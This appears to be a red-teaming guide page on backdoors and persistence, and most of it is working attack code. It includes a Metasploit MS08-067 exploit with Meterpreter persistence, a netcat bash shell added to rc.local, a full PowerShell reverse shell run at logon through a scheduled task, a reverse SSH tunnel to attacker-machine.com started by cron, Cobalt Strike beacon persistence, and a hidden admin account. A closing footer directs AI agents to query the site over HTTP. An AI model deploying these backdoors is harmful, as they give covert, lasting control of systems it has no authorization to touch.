# Backdoors ### Practical Guide to Backdoors in Red Teaming Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors. **Creating a Persistent Meterpreter Session** **Tool:** Metasploit **Steps:** * Exploit a vulnerability to gain an initial foothold. * Migrate to a stable process to maintain the session. * Set up persistence with a Meterpreter script. ```bash use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.1.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 exploit ``` Once the session is established: ```bash meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101 ``` This command sets up a persistent Meterpreter backdoor that will start every time the user logs in. **Using Netcat for a Simple Backdoor** **Tool:** Netcat **Steps:** * Transfer Netcat to the target system. * Set up a persistent listener on the target system. **Example:** ```bash nc -lvp 4444 -e /bin/bash ``` To make it persistent, add the command to a startup script: ```bash echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local ``` **Using PowerShell for Windows Persistence** **Tool:** PowerShell **Steps:** * Create a PowerShell script to establish a reverse shell. * Use Task Scheduler to run the script at startup. **Example:** {% code overflow="wrap" %} ```powershell $client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte, 0, $sendbyte.Length) $stream.Flush()} $client.Close() ``` {% endcode %} Save this script and schedule it using Task Scheduler: ```powershell schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1" ``` **Creating a Reverse SSH Tunnel** **Tool:** SSH **Steps:** * Set up a reverse SSH tunnel to maintain access. **Example:** ```bash ssh -R 9090:localhost:22 user@attacker-machine.com ``` To make it persistent, add the command to `cron`: ```bash (crontab -l ; echo "@reboot ssh -R 9090:localhost:22 user@attacker-machine.com") | crontab - ``` **Deploying Custom Backdoor with C2 Framework** **Tool:** Cobalt Strike **Steps:** * Use Cobalt Strike to create a custom beacon. * Deploy the beacon on the target system and set it to call back periodically. **Example:** ```bash ./teamserver ./agscript > spawnb 192.168.1.100 ``` In Cobalt Strike: ```bash beacon> run persistence -script windows/beacon.exe -args 192.168.1.101 4444 ``` **Hidden User Accounts:** Creating hidden user accounts with elevated privileges. **Example: Creating a Hidden Admin User on Windows:** ```powershell net user hiddenadmin P@ssw0rd /add net localgroup administrators hiddenadmin /add ```
**Impact:** The hidden user account provides the attacker with administrative access. Some useful Backdoor references: {% embed url="" %} {% embed url="" %} {% embed url="" %} {% hint style="info" %} Understanding and effectively implementing persistence and backdoor techniques are critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defenses by using advanced Red Teaming techniques that we cover in our live Red Teaming workshops. {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.redteamgarage.com/backdoors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.